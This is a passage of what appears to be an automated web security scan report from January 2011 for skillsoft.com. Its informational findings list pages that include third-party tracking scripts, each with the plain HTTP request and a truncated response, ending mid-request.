Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42312
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.34. http://skillsoft.com/about/partners/IT/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/IT/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/partners/IT/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41429
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.35. http://skillsoft.com/about/partners/channel/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/channel/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/partners/channel/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43205
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.36. http://skillsoft.com/about/partners/olsa/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/olsa/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/partners/olsa/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45961
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.37. http://skillsoft.com/about/partners/solutionpartners/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/solutionpartners/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/partners/solutionpartners/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43712
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.38. http://skillsoft.com/about/press_room/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press_room/ HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40728
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.39. http://skillsoft.com/about/press_room/in_the_news.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/in_the_news.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press_room/in_the_news.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92786
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.40. http://skillsoft.com/about/press_room/press_releases/December_09_10_Awards.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_09_10_Awards.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press_room/press_releases/December_09_10_Awards.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48605
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.41. http://skillsoft.com/about/press_room/press_releases/December_10_10_Financials.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_10_10_Financials.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press_room/press_releases/December_10_10_Financials.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 167288
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.42. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_13_10_ThomasNelson.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press_room/press_releases/December_13_10_ThomasNelson.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50406
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.43. http://skillsoft.com/about/press_room/press_releases/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/press_room/press_releases/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 135588
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.44. http://skillsoft.com/about/worldwide.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/worldwide.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/worldwide.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40423
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.45. http://skillsoft.com/error.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /error.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /error.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33260
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.46. http://skillsoft.com/privacy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /privacy.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48303
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.47. http://skillsoft.com/products/BES.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/BES.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/BES.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47265
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.48. http://skillsoft.com/products/KnowledgeCenters/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/KnowledgeCenters/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/KnowledgeCenters/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57457
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...

4.49. http://skillsoft.com/products/LDC/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/LDC/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/LDC/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48387
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.50. http://skillsoft.com/products/SLA/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SLA/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/SLA/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
